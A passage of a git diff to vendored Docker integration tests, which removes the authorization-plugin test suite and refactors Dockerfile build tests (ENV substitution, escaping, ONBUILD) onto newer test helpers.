check.NotNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Error response from daemon: plugin %s failed with error:", authzPluginNameWithTag)) -} - -func (s *DockerAuthzV2Suite) TestAuthZPluginBadManifestFailsDaemonStart(c *check.C) { - testRequires(c, DaemonIsLinux, IsAmd64, Network) - // Install authz plugin with bad manifest - _, err := s.d.Cmd("plugin", "install", 
"--grant-all-permissions", authzPluginBadManifestName) - c.Assert(err, checker.IsNil) - - // start the daemon with the plugin, it will error - c.Assert(s.d.Restart("--authorization-plugin="+authzPluginBadManifestName), check.NotNil) - - // restarting the daemon without requiring the plugin will succeed - c.Assert(s.d.Restart(), check.IsNil) -} - -func (s *DockerAuthzV2Suite) TestNonexistentAuthZPluginFailsDaemonStart(c *check.C) { - testRequires(c, DaemonIsLinux, Network) - // start the daemon with a non-existent authz plugin, it will error - c.Assert(s.d.Restart("--authorization-plugin="+nonexistentAuthzPluginName), check.NotNil) - - // restarting the daemon without requiring the plugin will succeed - c.Assert(s.d.Restart(), check.IsNil) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go deleted file mode 100644 index a826249e2e..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go +++ /dev/null @@ -1,477 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - "fmt" - "io/ioutil" - "net/http" - "net/http/httptest" - "os" - "path/filepath" - "strings" - - "bufio" - "bytes" - "os/exec" - "strconv" - "time" - - "net" - "net/http/httputil" - "net/url" - - "github.com/docker/docker/pkg/authorization" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/plugins" - "github.com/go-check/check" -) - -const ( - testAuthZPlugin = "authzplugin" - unauthorizedMessage = "User unauthorized authz plugin" - errorMessage = "something went wrong..." 
- containerListAPI = "/containers/json" -) - -var ( - alwaysAllowed = []string{"/_ping", "/info"} -) - -func init() { - check.Suite(&DockerAuthzSuite{ - ds: &DockerSuite{}, - }) -} - -type DockerAuthzSuite struct { - server *httptest.Server - ds *DockerSuite - d *Daemon - ctrl *authorizationController -} - -type authorizationController struct { - reqRes authorization.Response // reqRes holds the plugin response to the initial client request - resRes authorization.Response // resRes holds the plugin response to the daemon response - psRequestCnt int // psRequestCnt counts the number of calls to list container request api - psResponseCnt int // psResponseCnt counts the number of calls to list containers response API - requestsURIs []string // requestsURIs stores all request URIs that are sent to the authorization controller - reqUser string - resUser string -} - -func (s *DockerAuthzSuite) SetUpTest(c *check.C) { - s.d = NewDaemon(c) - s.ctrl = &authorizationController{} -} - -func (s *DockerAuthzSuite) TearDownTest(c *check.C) { - s.d.Stop() - s.ds.TearDownTest(c) - s.ctrl = nil -} - -func (s *DockerAuthzSuite) SetUpSuite(c *check.C) { - mux := http.NewServeMux() - s.server = httptest.NewServer(mux) - - mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) { - b, err := json.Marshal(plugins.Manifest{Implements: []string{authorization.AuthZApiImplements}}) - c.Assert(err, check.IsNil) - w.Write(b) - }) - - mux.HandleFunc("/AuthZPlugin.AuthZReq", func(w http.ResponseWriter, r *http.Request) { - defer r.Body.Close() - body, err := ioutil.ReadAll(r.Body) - c.Assert(err, check.IsNil) - authReq := authorization.Request{} - err = json.Unmarshal(body, &authReq) - c.Assert(err, check.IsNil) - - assertBody(c, authReq.RequestURI, authReq.RequestHeaders, authReq.RequestBody) - assertAuthHeaders(c, authReq.RequestHeaders) - - // Count only container list api - if strings.HasSuffix(authReq.RequestURI, containerListAPI) { - s.ctrl.psRequestCnt++ - } - - 
s.ctrl.requestsURIs = append(s.ctrl.requestsURIs, authReq.RequestURI) - - reqRes := s.ctrl.reqRes - if isAllowed(authReq.RequestURI) { - reqRes = authorization.Response{Allow: true} - } - if reqRes.Err != "" { - w.WriteHeader(http.StatusInternalServerError) - } - b, err := json.Marshal(reqRes) - c.Assert(err, check.IsNil) - s.ctrl.reqUser = authReq.User - w.Write(b) - }) - - mux.HandleFunc("/AuthZPlugin.AuthZRes", func(w http.ResponseWriter, r *http.Request) { - defer r.Body.Close() - body, err := ioutil.ReadAll(r.Body) - c.Assert(err, check.IsNil) - authReq := authorization.Request{} - err = json.Unmarshal(body, &authReq) - c.Assert(err, check.IsNil) - - assertBody(c, authReq.RequestURI, authReq.ResponseHeaders, authReq.ResponseBody) - assertAuthHeaders(c, authReq.ResponseHeaders) - - // Count only container list api - if strings.HasSuffix(authReq.RequestURI, containerListAPI) { - s.ctrl.psResponseCnt++ - } - resRes := s.ctrl.resRes - if isAllowed(authReq.RequestURI) { - resRes = authorization.Response{Allow: true} - } - if resRes.Err != "" { - w.WriteHeader(http.StatusInternalServerError) - } - b, err := json.Marshal(resRes) - c.Assert(err, check.IsNil) - s.ctrl.resUser = authReq.User - w.Write(b) - }) - - err := os.MkdirAll("/etc/docker/plugins", 0755) - c.Assert(err, checker.IsNil) - - fileName := fmt.Sprintf("/etc/docker/plugins/%s.spec", testAuthZPlugin) - err = ioutil.WriteFile(fileName, []byte(s.server.URL), 0644) - c.Assert(err, checker.IsNil) -} - -// check for always allowed endpoints to not inhibit test framework functions -func isAllowed(reqURI string) bool { - for _, endpoint := range alwaysAllowed { - if strings.HasSuffix(reqURI, endpoint) { - return true - } - } - return false -} - -// assertAuthHeaders validates authentication headers are removed -func assertAuthHeaders(c *check.C, headers map[string]string) error { - for k := range headers { - if strings.Contains(strings.ToLower(k), "auth") || strings.Contains(strings.ToLower(k), "x-registry") { - 
c.Errorf("Found authentication headers in request '%v'", headers) - } - } - return nil -} - -// assertBody asserts that body is removed for non text/json requests -func assertBody(c *check.C, requestURI string, headers map[string]string, body []byte) { - if strings.Contains(strings.ToLower(requestURI), "auth") && len(body) > 0 { - //return fmt.Errorf("Body included for authentication endpoint %s", string(body)) - c.Errorf("Body included for authentication endpoint %s", string(body)) - } - - for k, v := range headers { - if strings.EqualFold(k, "Content-Type") && strings.HasPrefix(v, "text/") || v == "application/json" { - return - } - } - if len(body) > 0 { - c.Errorf("Body included while it should not (Headers: '%v')", headers) - } -} - -func (s *DockerAuthzSuite) TearDownSuite(c *check.C) { - if s.server == nil { - return - } - - s.server.Close() - - err := os.RemoveAll("/etc/docker/plugins") - c.Assert(err, checker.IsNil) -} - -func (s *DockerAuthzSuite) TestAuthZPluginAllowRequest(c *check.C) { - // start the daemon and load busybox, --net=none build fails otherwise - // cause it needs to pull busybox - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - // Ensure command successful - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil) - - id := strings.TrimSpace(out) - assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") - assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", id)) - - out, err = s.d.Cmd("ps") - c.Assert(err, check.IsNil) - c.Assert(assertContainerList(out, []string{id}), check.Equals, true) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) -} - -func (s *DockerAuthzSuite) TestAuthZPluginTls(c *check.C) { - - const testDaemonHTTPSAddr = "tcp://localhost:4271" - // start the daemon and load busybox, 
--net=none build fails otherwise - // cause it needs to pull busybox - if err := s.d.Start( - "--authorization-plugin="+testAuthZPlugin, - "--tlsverify", - "--tlscacert", - "fixtures/https/ca.pem", - "--tlscert", - "fixtures/https/server-cert.pem", - "--tlskey", - "fixtures/https/server-key.pem", - "-H", testDaemonHTTPSAddr); err != nil { - c.Fatalf("Could not start daemon with busybox: %v", err) - } - - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - - out, _ := dockerCmd( - c, - "--tlsverify", - "--tlscacert", "fixtures/https/ca.pem", - "--tlscert", "fixtures/https/client-cert.pem", - "--tlskey", "fixtures/https/client-key.pem", - "-H", - testDaemonHTTPSAddr, - "version", - ) - if !strings.Contains(out, "Server") { - c.Fatalf("docker version should return information of server side") - } - - c.Assert(s.ctrl.reqUser, check.Equals, "client") - c.Assert(s.ctrl.resUser, check.Equals, "client") -} - -func (s *DockerAuthzSuite) TestAuthZPluginDenyRequest(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = false - s.ctrl.reqRes.Msg = unauthorizedMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 0) - - // Ensure unauthorized message appears in response - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) -} - -// TestAuthZPluginAPIDenyResponse validates that when authorization plugin deny the request, the status code is forbidden -func (s *DockerAuthzSuite) TestAuthZPluginAPIDenyResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = false - s.ctrl.resRes.Msg = unauthorizedMessage - - daemonURL, err := url.Parse(s.d.sock()) - - conn, err := 
net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) - c.Assert(err, check.IsNil) - client := httputil.NewClientConn(conn, nil) - req, err := http.NewRequest("GET", "/version", nil) - c.Assert(err, check.IsNil) - resp, err := client.Do(req) - - c.Assert(err, check.IsNil) - c.Assert(resp.StatusCode, checker.Equals, http.StatusForbidden) - c.Assert(err, checker.IsNil) -} - -func (s *DockerAuthzSuite) TestAuthZPluginDenyResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = false - s.ctrl.resRes.Msg = unauthorizedMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) - - // Ensure unauthorized message appears in response - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: authorization denied by plugin %s: %s\n", testAuthZPlugin, unauthorizedMessage)) -} - -// TestAuthZPluginAllowEventStream verifies event stream propagates correctly after request pass through by the authorization plugin -func (s *DockerAuthzSuite) TestAuthZPluginAllowEventStream(c *check.C) { - testRequires(c, DaemonIsLinux) - - // start the daemon and load busybox to avoid pulling busybox from Docker Hub - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - startTime := strconv.FormatInt(daemonTime(c).Unix(), 10) - // Add another command to to enable event pipelining - eventsCmd := exec.Command(dockerBinary, "--host", s.d.sock(), "events", "--since", startTime) - stdout, err := eventsCmd.StdoutPipe() - if err != nil { - c.Assert(err, check.IsNil) - } - - observer := eventObserver{ - buffer: new(bytes.Buffer), - command: eventsCmd, - scanner: bufio.NewScanner(stdout), - startTime: 
startTime, - } - - err = observer.Start() - c.Assert(err, checker.IsNil) - defer observer.Stop() - - // Create a container and wait for the creation events - out, err := s.d.Cmd("run", "-d", "busybox", "top") - c.Assert(err, check.IsNil, check.Commentf(out)) - containerID := strings.TrimSpace(out) - c.Assert(s.d.waitRun(containerID), checker.IsNil) - - events := map[string]chan bool{ - "create": make(chan bool, 1), - "start": make(chan bool, 1), - } - - matcher := matchEventLine(containerID, "container", events) - processor := processEventMatch(events) - go observer.Match(matcher, processor) - - // Ensure all events are received - for event, eventChannel := range events { - - select { - case <-time.After(30 * time.Second): - // Fail the test - observer.CheckEventError(c, containerID, event, matcher) - c.FailNow() - case <-eventChannel: - // Ignore, event received - } - } - - // Ensure both events and container endpoints are passed to the authorization plugin - assertURIRecorded(c, s.ctrl.requestsURIs, "/events") - assertURIRecorded(c, s.ctrl.requestsURIs, "/containers/create") - assertURIRecorded(c, s.ctrl.requestsURIs, fmt.Sprintf("/containers/%s/start", containerID)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginErrorResponse(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Err = errorMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - - c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiResponse, errorMessage)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginErrorRequest(c *check.C) { - err := s.d.Start("--authorization-plugin=" + testAuthZPlugin) - c.Assert(err, check.IsNil) - s.ctrl.reqRes.Err = errorMessage - - // Ensure command is blocked - res, err := s.d.Cmd("ps") - c.Assert(err, check.NotNil) - - 
c.Assert(res, check.Equals, fmt.Sprintf("Error response from daemon: plugin %s failed with error: %s: %s\n", testAuthZPlugin, authorization.AuthZApiRequest, errorMessage)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginEnsureNoDuplicatePluginRegistration(c *check.C) { - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) - - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - - out, err := s.d.Cmd("ps") - c.Assert(err, check.IsNil, check.Commentf(out)) - - // assert plugin is only called once.. - c.Assert(s.ctrl.psRequestCnt, check.Equals, 1) - c.Assert(s.ctrl.psResponseCnt, check.Equals, 1) -} - -func (s *DockerAuthzSuite) TestAuthZPluginEnsureLoadImportWorking(c *check.C) { - c.Assert(s.d.Start("--authorization-plugin="+testAuthZPlugin, "--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - c.Assert(s.d.LoadBusybox(), check.IsNil) - - tmp, err := ioutil.TempDir("", "test-authz-load-import") - c.Assert(err, check.IsNil) - defer os.RemoveAll(tmp) - - savedImagePath := filepath.Join(tmp, "save.tar") - - out, err := s.d.Cmd("save", "-o", savedImagePath, "busybox") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("load", "--input", savedImagePath) - c.Assert(err, check.IsNil, check.Commentf(out)) - - exportedImagePath := filepath.Join(tmp, "export.tar") - - out, err = s.d.Cmd("run", "-d", "--name", "testexport", "busybox") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("export", "-o", exportedImagePath, "testexport") - c.Assert(err, check.IsNil, check.Commentf(out)) - out, err = s.d.Cmd("import", exportedImagePath) - c.Assert(err, check.IsNil, check.Commentf(out)) -} - -func (s *DockerAuthzSuite) TestAuthZPluginHeader(c *check.C) { - c.Assert(s.d.Start("--debug", "--authorization-plugin="+testAuthZPlugin), check.IsNil) - s.ctrl.reqRes.Allow = true - s.ctrl.resRes.Allow = true - 
c.Assert(s.d.LoadBusybox(), check.IsNil) - - daemonURL, err := url.Parse(s.d.sock()) - - conn, err := net.DialTimeout(daemonURL.Scheme, daemonURL.Path, time.Second*10) - c.Assert(err, check.IsNil) - client := httputil.NewClientConn(conn, nil) - req, err := http.NewRequest("GET", "/version", nil) - c.Assert(err, check.IsNil) - resp, err := client.Do(req) - - c.Assert(err, check.IsNil) - c.Assert(resp.Header["Content-Type"][0], checker.Equals, "application/json") -} - -// assertURIRecorded verifies that the given URI was sent and recorded in the authz plugin -func assertURIRecorded(c *check.C, uris []string, uri string) { - var found bool - for _, u := range uris { - if strings.Contains(u, uri) { - found = true - break - } - } - if !found { - c.Fatalf("Expected to find URI '%s', recorded uris '%s'", uri, strings.Join(uris, ",")) - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go index 49c1062c25..1e88b1ba39 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_test.go @@ -7,7 +7,6 @@ import ( "fmt" "io/ioutil" "os" - "os/exec" "path/filepath" "reflect" "regexp" @@ -17,58 +16,44 @@ import ( "text/template" "time" - "github.com/docker/docker/builder/dockerfile/command" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakegit" + "github.com/docker/docker/internal/test/fakestorage" + "github.com/docker/docker/internal/testutil" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringutils" "github.com/go-check/check" + 
"github.com/moby/buildkit/frontend/dockerfile/command" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) func (s *DockerSuite) TestBuildJSONEmptyRun(c *check.C) { - name := "testbuildjsonemptyrun" - - _, err := buildImage( - name, - ` + cli.BuildCmd(c, "testbuildjsonemptyrun", build.WithDockerfile(` FROM busybox RUN [] - `, - true) - - if err != nil { - c.Fatal("error when dealing with a RUN statement with empty JSON array") - } - + `)) } func (s *DockerSuite) TestBuildShCmdJSONEntrypoint(c *check.C) { name := "testbuildshcmdjsonentrypoint" + expected := "/bin/sh -c echo test" + if testEnv.OSType == "windows" { + expected = "cmd /S /C echo test" + } - _, err := buildImage( - name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENTRYPOINT ["echo"] CMD echo test - `, - true) - if err != nil { - c.Fatal(err) - } - + `)) out, _ := dockerCmd(c, "run", "--rm", name) - if daemonPlatform == "windows" { - if !strings.Contains(out, "cmd /S /C echo test") { - c.Fatalf("CMD did not contain cmd /S /C echo test : %q", out) - } - } else { - if strings.TrimSpace(out) != "/bin/sh -c echo test" { - c.Fatalf("CMD did not contain /bin/sh -c : %q", out) - } + if strings.TrimSpace(out) != expected { + c.Fatalf("CMD did not contain %q : %q", expected, out) } - } func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { @@ -76,21 +61,16 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementUser(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM scratch ENV user foo USER ${user} - `, true) - if err != nil { - c.Fatal(err) - } - + `)) res := inspectFieldJSON(c, name, "Config.User") if res != `"foo"` { c.Fatal("User foo from environment not in Config.User on image") } - } func (s *DockerSuite) TestBuildEnvironmentReplacementVolume(c *check.C) { @@ -98,29 +78,20 @@ func (s *DockerSuite) 
TestBuildEnvironmentReplacementVolume(c *check.C) { var volumePath string - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { volumePath = "c:/quux" } else { volumePath = "/quux" } - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` ENV volume `+volumePath+` VOLUME ${volume} - `, true) - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.Volumes") + `)) var volumes map[string]interface{} - - if err := json.Unmarshal([]byte(res), &volumes); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &volumes) if _, ok := volumes[volumePath]; !ok { c.Fatal("Volume " + volumePath + " from environment not in Config.Volumes on image") } @@ -132,27 +103,17 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM scratch ENV port 80 EXPOSE ${port} ENV ports " 99 100 " EXPOSE ${ports} - `, true) - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.ExposedPorts") + `)) var exposedPorts map[string]interface{} - - if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { - c.Fatal(err) - } - + inspectFieldAndUnmarshall(c, name, "Config.ExposedPorts", &exposedPorts) exp := []int{80, 99, 100} - for _, p := range exp { tmp := fmt.Sprintf("%d/tcp", p) if _, ok := exposedPorts[tmp]; !ok { @@ -165,23 +126,28 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementExpose(c *check.C) { func (s *DockerSuite) TestBuildEnvironmentReplacementWorkdir(c *check.C) { name := "testbuildenvironmentreplacement" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV MYWORKDIR /work RUN mkdir ${MYWORKDIR} WORKDIR ${MYWORKDIR} - `, true) + `)) + res := inspectFieldJSON(c, name, 
"Config.WorkingDir") - if err != nil { - c.Fatal(err) + expected := `"/work"` + if testEnv.OSType == "windows" { + expected = `"C:\\work"` + } + if res != expected { + c.Fatalf("Workdir /workdir from environment not in Config.WorkingDir on image: %s", res) } - } func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { name := "testbuildenvironmentreplacement" - ctx, err := fakeContext(` + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", ` FROM `+minimalBaseImage()+` ENV baz foo ENV quux bar @@ -193,23 +159,12 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementAddCopy(c *check.C) { COPY ${quux} ${dot} ADD ${zzz:-${fee}} ${dot} COPY ${zzz:-${gee}} ${dot} - `, - map[string]string{ - "foo": "test1", - "bar": "test2", - "fff": "test3", - "ggg": "test4", - }) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } - + `), + build.WithFile("foo", "test1"), + build.WithFile("bar", "test2"), + build.WithFile("fff", "test3"), + build.WithFile("ggg", "test4"), + )) } func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { @@ -217,8 +172,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildenvironmentreplacement" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV foo zzz ENV bar ${foo} @@ -231,20 +185,18 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { RUN [ "$abc3" = '$foo' ] && (echo "$abc3" | grep -q foo) ENV abc4 "\$foo" RUN [ "$abc4" = '$foo' ] && (echo "$abc4" | grep -q foo) - `, true) - - if err != nil { - c.Fatal(err) - } - - res := inspectFieldJSON(c, name, "Config.Env") - - envResult := []string{} - - if err = json.Unmarshal([]byte(res), &envResult); err != nil { - c.Fatal(err) - } - + ENV foo2="abc\def" + RUN [ "$foo2" = 'abc\def' ] + ENV 
foo3="abc\\def" + RUN [ "$foo3" = 'abc\def' ] + ENV foo4='abc\\def' + RUN [ "$foo4" = 'abc\\def' ] + ENV foo5='abc\def' + RUN [ "$foo5" = 'abc\def' ] + `)) + + var envResult []string + inspectFieldAndUnmarshall(c, name, "Config.Env", &envResult) found := false envCount := 0 @@ -258,7 +210,7 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { } else if strings.HasPrefix(parts[0], "env") { envCount++ if parts[1] != "zzz" { - c.Fatalf("%s should be 'foo' but instead its %q", parts[0], parts[1]) + c.Fatalf("%s should be 'zzz' but instead its %q", parts[0], parts[1]) } } else if strings.HasPrefix(parts[0], "env") { envCount++ @@ -278,114 +230,70 @@ func (s *DockerSuite) TestBuildEnvironmentReplacementEnv(c *check.C) { } -func (s *DockerSuite) TestBuildHandleEscapes(c *check.C) { +func (s *DockerSuite) TestBuildHandleEscapesInVolume(c *check.C) { // The volume paths used in this test are invalid on Windows testRequires(c, DaemonIsLinux) name := "testbuildhandleescapes" - _, err := buildImage(name, - ` - FROM scratch - ENV FOO bar - VOLUME ${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - var result map[string]map[string]struct{} - - res := inspectFieldJSON(c, name, "Config.Volumes") - - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } - - if _, ok := result["bar"]; !ok { - c.Fatalf("Could not find volume bar set from env foo in volumes table, got %q", result) - } - - deleteImages(name) - - _, err = buildImage(name, - ` - FROM scratch - ENV FOO bar - VOLUME \${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - res = inspectFieldJSON(c, name, "Config.Volumes") - - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } - - if _, ok := result["${FOO}"]; !ok { - c.Fatalf("Could not find volume ${FOO} set from env foo in volumes table, got %q", result) + testCases := []struct { + volumeValue string + expected string + }{ + { + volumeValue: "${FOO}", + expected: "bar", + }, + { + 
volumeValue: `\${FOO}`, + expected: "${FOO}", + }, + // this test in particular provides *7* backslashes and expects 6 to come back. + // Like above, the first escape is swallowed and the rest are treated as + // literals, this one is just less obvious because of all the character noise. + { + volumeValue: `\\\\\\\${FOO}`, + expected: `\\\${FOO}`, + }, } - deleteImages(name) - - // this test in particular provides *7* backslashes and expects 6 to come back. - // Like above, the first escape is swallowed and the rest are treated as - // literals, this one is just less obvious because of all the character noise. - - _, err = buildImage(name, - ` + for _, tc := range testCases { + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(` FROM scratch ENV FOO bar - VOLUME \\\\\\\${FOO} - `, true) - - if err != nil { - c.Fatal(err) - } - - res = inspectFieldJSON(c, name, "Config.Volumes") + VOLUME %s + `, tc.volumeValue))) - if err = json.Unmarshal([]byte(res), &result); err != nil { - c.Fatal(err) - } + var result map[string]map[string]struct{} + inspectFieldAndUnmarshall(c, name, "Config.Volumes", &result) + if _, ok := result[tc.expected]; !ok { + c.Fatalf("Could not find volume %s set from env foo in volumes table, got %q", tc.expected, result) + } - if _, ok := result[`\\\${FOO}`]; !ok { - c.Fatalf(`Could not find volume \\\${FOO} set from env foo in volumes table, got %q`, result) + // Remove the image for the next iteration + dockerCmd(c, "rmi", name) } - } func (s *DockerSuite) TestBuildOnBuildLowercase(c *check.C) { name := "testbuildonbuildlowercase" name2 := "testbuildonbuildlowercase2" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox onbuild run echo quux - `, true) - - if err != nil { - c.Fatal(err) - } + `)) - _, out, err := buildImageWithOut(name2, fmt.Sprintf(` + result := buildImage(name2, build.WithDockerfile(fmt.Sprintf(` FROM %s - `, name), true) - - if err != nil { - c.Fatal(err) - } + 
`, name))) + result.Assert(c, icmd.Success) - if !strings.Contains(out, "quux") { - c.Fatalf("Did not receive the expected echo text, got %s", out) + if !strings.Contains(result.Combined(), "quux") { + c.Fatalf("Did not receive the expected echo text, got %s", result.Combined()) } - if strings.Contains(out, "ONBUILD ONBUILD") { - c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", out) + if strings.Contains(result.Combined(), "ONBUILD ONBUILD") { + c.Fatalf("Got an ONBUILD ONBUILD error with no error: got %s", result.Combined()) } } @@ -394,20 +302,13 @@ func (s *DockerSuite) TestBuildEnvEscapes(c *check.C) { // ENV expansions work differently in Windows testRequires(c, DaemonIsLinux) name := "testbuildenvescapes" - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV TEST foo CMD echo \$ - `, - true) - - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "-t", name) - if strings.TrimSpace(out) != "$" { c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) } @@ -418,77 +319,48 @@ func (s *DockerSuite) TestBuildEnvOverwrite(c *check.C) { // ENV expansions work differently in Windows testRequires(c, DaemonIsLinux) name := "testbuildenvoverwrite" - - _, err := buildImage(name, - ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM busybox ENV TEST foo CMD echo ${TEST} - `, - true) - - if err != nil { - c.Fatal(err) - } + `)) out, _ := dockerCmd(c, "run", "-e", "TEST=bar", "-t", name) - if strings.TrimSpace(out) != "bar" { c.Fatalf("Env TEST was not overwritten with bar when foo was supplied to dockerfile: was %q", strings.TrimSpace(out)) } } +// FIXME(vdemeester) why we disabled cache here ? 
func (s *DockerSuite) TestBuildOnBuildCmdEntrypointJSON(c *check.C) { name1 := "onbuildcmd" name2 := "onbuildgenerated" - _, err := buildImage(name1, ` + cli.BuildCmd(c, name1, build.WithDockerfile(` FROM busybox ONBUILD CMD ["hello world"] ONBUILD ENTRYPOINT ["echo"] -ONBUILD RUN ["true"]`, - false) - - if err != nil { - c.Fatal(err) - } - - _, err = buildImage(name2, fmt.Sprintf(`FROM %s`, name1), false) - - if err != nil { - c.Fatal(err) - } - - out, _ := dockerCmd(c, "run", name2) +ONBUILD RUN ["true"]`)) - if !regexp.MustCompile(`(?m)^hello world`).MatchString(out) { - c.Fatalf("did not get echo output from onbuild. Got: %q", out) - } + cli.BuildCmd(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s`, name1))) + result := cli.DockerCmd(c, "run", name2) + result.Assert(c, icmd.Expected{Out: "hello world"}) } +// FIXME(vdemeester) why we disabled cache here ? func (s *DockerSuite) TestBuildOnBuildEntrypointJSON(c *check.C) { name1 := "onbuildcmd" name2 := "onbuildgenerated" - _, err := buildImage(name1, ` + buildImageSuccessfully(c, name1, build.WithDockerfile(` FROM busybox -ONBUILD ENTRYPOINT ["echo"]`, - false) - - if err != nil { - c.Fatal(err) - } - - _, err = buildImage(name2, fmt.Sprintf("FROM %s\nCMD [\"hello world\"]\n", 